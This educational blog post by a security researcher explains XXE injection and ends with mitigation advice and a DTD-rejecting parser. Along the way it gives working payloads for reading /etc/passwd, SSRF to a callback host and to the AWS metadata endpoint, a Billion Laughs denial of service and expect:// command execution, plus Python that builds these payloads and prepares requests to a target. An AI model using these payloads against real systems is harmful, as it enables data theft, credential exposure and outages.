Research on XML eXternal Entity Injection (XXE)

Prajit Sindhkar
Jan 8, 2022

Hello guys 👋👋, Prajit here from the BUG XS Team, and a Cybersecurity and Red Team Intern at Cyber Sapiens United LLP, where I am regularly given interesting tasks. For my tenth task I was asked to research XML External Entity Injection (XXE), which is one of my favorite vulnerabilities.

What is XXE?

An XML External Entity (XXE) attack (sometimes called an XXE injection attack) is a type of attack that abuses a widely available but rarely used feature of XML parsers.

You can use XML for much more than declaring elements, attributes, and text. XML documents can be of a specific type. You declare this type in the document by specifying the type definition.

The XML parser checks whether the XML document adheres to this type definition before it processes the document. You can use two types of type definitions: an XML Schema Definition (XSD) or a Document Type Definition (DTD).

XXE vulnerabilities arise from Document Type Definitions, because the DTD is where entities are declared. DTDs may be considered legacy, but they are still commonly used. They are derived from SGML (the ancestor of XML).

In the DTDs, we define some elements. A DTD element declaration consists of a tag name and a definition in parentheses.

What are Entities?

An entity is a named piece of XML content that is declared once and can be reused throughout a document by referencing it. It’s a sort of symbolic representation of information.

Entities can be used to substitute bits of information or difficult-to-type characters, or to include a complete document.

Entities must first be declared in a DTD before they can be used or referenced.

An entity is referenced in an XML document by writing its name between an ampersand and a semicolon, for example &foo; for an entity named foo.
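To make declaration and reference concrete, here is a minimal Python sketch. It assumes the standard library's xml.etree.ElementTree parser, which expands internal entities declared in the document's own DTD. The entity name foo and the element name doc are only illustrative.

```python
import xml.etree.ElementTree as ET

# The DTD declares the entity `foo`; the body references it as `&foo;`.
DOCUMENT = """<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY foo "InternalEntity">
]>
<doc>Value: &foo;</doc>"""

root = ET.fromstring(DOCUMENT)

# The parser substitutes the declared value wherever &foo; appears.
print(root.text)
```

The application never sees the reference itself, only the substituted text, which is why entity handling happens entirely inside the parser.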

There are basically three types of entities:

1) Internal Entity: This type of entity is defined entirely within the local DTD and can be used anywhere in the XML document. It basically works like a text replacement.

Eg: <!ENTITY foo "InternalEntity">

2) External Entity: This type of entity is declared in the DTD, but its content lives outside the local DTD. It is like fetching a resource from an external location and printing it wherever the entity is referenced. There are two types of external entity.

->Private: These are identified by the keyword SYSTEM and are intended for use by a single author.

Eg: <!ENTITY foo SYSTEM "URI/resource">

->Public: These are identified by the keyword PUBLIC and are intended for broader use.

Eg: <!ENTITY foo PUBLIC "public_id" "URI/resource">

3) Parameter Entity: This type of entity can be used only inside the DTD. It is declared with the % symbol and referenced as %foo;.

Eg: <!ENTITY % foo "entity_value">
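The entity types listed above can be told apart programmatically. The following is a rough sketch using Python's standard xml.parsers.expat module and its EntityDeclHandler callback. The function name classify_entities, the entity names, and the example URIs are assumptions made for illustration.

```python
import xml.parsers.expat


def classify_entities(xml_text):
    """Return a {entity_name: kind} mapping for every entity declared in the DTD."""
    kinds = {}

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        if is_parameter:
            kinds[name] = "parameter"
        elif value is not None:
            # Internal entities carry their replacement text directly.
            kinds[name] = "internal"
        elif public_id is not None:
            kinds[name] = "external (PUBLIC)"
        else:
            kinds[name] = "external (SYSTEM)"

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return kinds


SAMPLE = """<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY internal "InternalEntity">
  <!ENTITY private SYSTEM "file:///etc/hostname">
  <!ENTITY public PUBLIC "public_id" "http://example.com/resource">
  <!ENTITY % param "entity_value">
]>
<doc/>"""

if __name__ == "__main__":
    for name, kind in classify_entities(SAMPLE).items():
        print(name, "->", kind)
```

Nothing is fetched here: the entities are only declared, never referenced, so the sketch is safe to run on untrusted samples when triaging payloads.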

In finding XXE vulnerabilities we will focus more on external entities.

Why Does XXE Occur?

XXE occurs because an XML parser that resolves external entities will retrieve whatever resource the entity points to, whether that is a local file or a URL anywhere on the internet.

An attacker who controls the XML input can therefore declare external entities, private (SYSTEM) or public (PUBLIC) as shown above, and make the parser fetch information it should never expose.

Types of Attacks via XXE

1. LFI via XXE: An attacker can make the following request using a URI (known in XML as the system identifier). If the XML parser is configured to process external entities (by default, many popular XML parsers are configured to do so), the web server will return the contents of a file on the system, potentially containing sensitive data.

Payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>

Working:

[Screenshot: LFI via XXE]
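To see what "configured to process external entities" means in practice, here is a deliberately unsafe toy parser built on Python's standard xml.parsers.expat module. It is only a sketch: the function names are made up for illustration, it handles file:// identifiers only, and a real vulnerable application would normally get this behavior from its XML library rather than from hand-written code.

```python
import pathlib
import tempfile
import xml.parsers.expat
from urllib.parse import urlparse
from urllib.request import url2pathname


def parse_with_external_entities(xml_text):
    """Deliberately UNSAFE: resolves file:// external entities and returns the text."""
    text_chunks = []
    parser = xml.parsers.expat.ParserCreate()

    def on_text(data):
        text_chunks.append(data)

    def on_external_entity(context, base, system_id, public_id):
        # The dangerous step: open whatever the attacker-supplied
        # system identifier points to and feed it into the document.
        path = url2pathname(urlparse(system_id).path)
        with open(path, "rb") as handle:
            content = handle.read()
        child = parser.ExternalEntityParserCreate(context)
        child.CharacterDataHandler = on_text
        child.Parse(content, True)
        return 1  # tell expat the entity was handled

    parser.CharacterDataHandler = on_text
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_text, True)
    return "".join(text_chunks)


def build_file_payload(file_uri):
    """Same shape as the payload above, with a configurable file URI."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "{file_uri}">]>\n'
        "<foo>&xxe;</foo>"
    )


if __name__ == "__main__":
    # Use a throwaway file instead of /etc/passwd so the demo is harmless.
    with tempfile.TemporaryDirectory() as tmp:
        secret = pathlib.Path(tmp) / "secret.txt"
        secret.write_text("db_password=hunter2\n")
        print(parse_with_external_entities(build_file_payload(secret.as_uri())))
```

The file contents end up as the text of the foo element, so any application that echoes that element back to the user leaks the file.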

2. SSRF via XXE: Aside from retrieval of sensitive data, the other main impact of XXE attacks is that they can be used to perform server-side request forgery (SSRF). This is a potentially serious vulnerability in which the server-side application can be induced to make HTTP requests to any URL that the server can access.

Payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "https://<burplink>">]>
<foo>&xxe;</foo>

Working:

If you receive an HTTP request in Burp Collaborator after sending the payload above, the target is vulnerable to SSRF. You can then increase the impact by reading cloud instance metadata (for example on AWS EC2) with the following payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<foo>&xxe;</foo>
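When testing several system identifiers (a file, a collaborator URL, a metadata URL), it can help to generate the payload instead of editing it by hand. The sketch below uses only Python's standard library. The helper names and the target URL https://target.example/api/import are hypothetical, and the request is prepared but not sent.

```python
import urllib.request


def build_xxe_payload(system_id):
    """Return the XXE test document with `system_id` as the entity target."""
    if '"' in system_id:
        raise ValueError("system identifier must not contain a double quote")
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        f'<!ENTITY xxe SYSTEM "{system_id}">]>\n'
        "<foo>&xxe;</foo>"
    )


def build_request(target_url, system_id):
    """Prepare (but do not send) a POST request carrying the payload."""
    body = build_xxe_payload(system_id).encode("utf-8")
    return urllib.request.Request(
        target_url,
        data=body,
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


if __name__ == "__main__":
    # Hypothetical target; only test systems you are authorized to assess.
    request = build_request(
        "https://target.example/api/import",
        "http://169.254.169.254/latest/meta-data/",
    )
    print(request.data.decode("utf-8"))
    # To actually send it: urllib.request.urlopen(request, timeout=10)
```

Keeping the send step separate makes it easy to review the exact bytes before anything touches the target.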

3. DoS via XXE: It may seem harmless, but an attacker can use XML entities to cause a denial of service by embedding entities within entities within entities. This attack is commonly referred to as the Billion Laughs attack. It overloads the memory of the XML parser. Some XML parsers automatically limit the amount of memory they can use.

Payload:

<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]>
<lolz>&lol9;</lolz>

Working:

[Screenshot: DoS via XXE]
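The damage comes from simple arithmetic: each level multiplies the size of the previous one. The Python sketch below computes the expanded size of the payload above without expanding it, then parses a harmless scaled-down version with the standard library's xml.etree.ElementTree to confirm the formula. The function names are illustrative assumptions.

```python
import xml.etree.ElementTree as ET


def expanded_length(base_length, fanout, levels):
    """Characters produced when `levels` nested entities each repeat the previous one `fanout` times."""
    return base_length * fanout ** levels


def build_nested_entities(fanout, levels):
    """Generate a Billion-Laughs-style document with the given fan-out and depth."""
    declarations = ['<!ENTITY lol "lol">']
    previous = "lol"
    for level in range(1, levels + 1):
        name = f"lol{level}"
        references = f"&{previous};" * fanout
        declarations.append(f'<!ENTITY {name} "{references}">')
        previous = name
    dtd = "\n".join(declarations)
    return (
        '<?xml version="1.0"?>\n'
        f"<!DOCTYPE lolz [\n{dtd}\n]>\n"
        f"<lolz>&{previous};</lolz>"
    )


# The payload above: "lol" is 3 characters, 10 references per level, 9 levels.
full_size = expanded_length(3, 10, 9)
print(full_size)  # 3000000000 characters, roughly 3 GB of text

# A scaled-down version (3 references per level, 3 levels) is safe to parse.
small = ET.fromstring(build_nested_entities(fanout=3, levels=3))
print(len(small.text), expanded_length(3, 3, 3))
```

A document of under a kilobyte therefore asks the parser to hold about three billion characters in memory, unless the parser enforces an expansion limit.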

4. RCE via XXE: In rare cases XXE can be escalated to remote code execution (RCE). If the PHP extension called expect is loaded on the server, its expect:// wrapper lets an external entity execute system commands, so the payload below would run whoami on the server.

Payload:

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "expect://whoami">]>
<foo>&xxe;</foo>

Types of XXE:

There are basically two types of XXE:

1. In-band XXE: When the attacker receives the result of the attack in the same channel as the request, that is, in the application's own response, it is called In-Band XXE. In-Band XXE is easy to exploit, and an attacker can retrieve the server’s internal files or execute commands on the server’s shell.

2. Out of Band XXE: When an attacker can’t receive the results in the same band or channel, they try to retrieve the desired information via some other channel. If an attacker can get the information via some other band or channel, this is called Out of Band XXE.

How to mitigate XXE?

Virtually all XXE vulnerabilities arise because the application’s XML parsing library supports potentially dangerous XML features that the application does not need or intend to use. The easiest and most effective way to prevent XXE attacks is to disable those features.

Generally, it is sufficient to disable resolution of external entities and disable support for XInclude. This can usually be done via configuration options or by programmatically overriding default behavior. Consult the documentation for your XML parsing library or API for details about how to disable unnecessary capabilities.

Where the application does not need them at all, the safest option is to completely disable Document Type Definitions (DTDs).
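As one possible way to disable DTDs in Python, the sketch below rejects any document that contains a DOCTYPE before handing it to the standard library's xml.etree.ElementTree. The names DTDForbidden and safe_fromstring are assumptions for illustration, not an existing API. The document is parsed twice to keep the example simple; maintained libraries such as defusedxml offer a similar check ready-made.

```python
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DTDForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def safe_fromstring(xml_text):
    """Parse XML only if it carries no DTD (and therefore no entity declarations)."""

    def forbid_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE '{name}' is not allowed in untrusted XML")

    # First pass: a bare expat parser whose only job is to spot a DOCTYPE.
    checker = xml.parsers.expat.ParserCreate()
    checker.StartDoctypeDeclHandler = forbid_doctype
    checker.Parse(xml_text, True)

    # Second pass: the document is DTD-free, so build the tree as usual.
    return ET.fromstring(xml_text)


XXE_PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<foo>&xxe;</foo>"""

if __name__ == "__main__":
    print(safe_fromstring("<foo>hello</foo>").text)
    try:
        safe_fromstring(XXE_PAYLOAD)
    except DTDForbidden as error:
        print("rejected:", error)
```

Because every attack in this writeup starts with a DOCTYPE, refusing it outright blocks the file read, SSRF, Billion Laughs, and expect:// payloads in one place.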

This is all for today’s writeup.

Thanks For Reading 😊

References:

https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/

https://portswigger.net/web-security/xxe

https://www.neuralegion.com/blog/xml-external-entity-xxe-injection/#types-of-xxe-attacks

https://niravgadhiya.blogspot.com/2020/03/out-of-band-xml-external-entity-xxe.html

https://niravgadhiya.blogspot.com/2020/03/in-band-xml-external-entity-xxe.html

Profile Links:

Twitter: https://twitter.com/SAPT01

LinkedIn: https://www.linkedin.com/in/prajit-sindhkar-3563b71a6/

Instagram: https://instagram.com/prajit_01?utm_medium=copy_link

BUG XS Official Website: https://www.bugxs.co/


I am an India-based security researcher, Bugcrowd Top 500 hacker, and Bug Bounty Leader of the BUGXS community.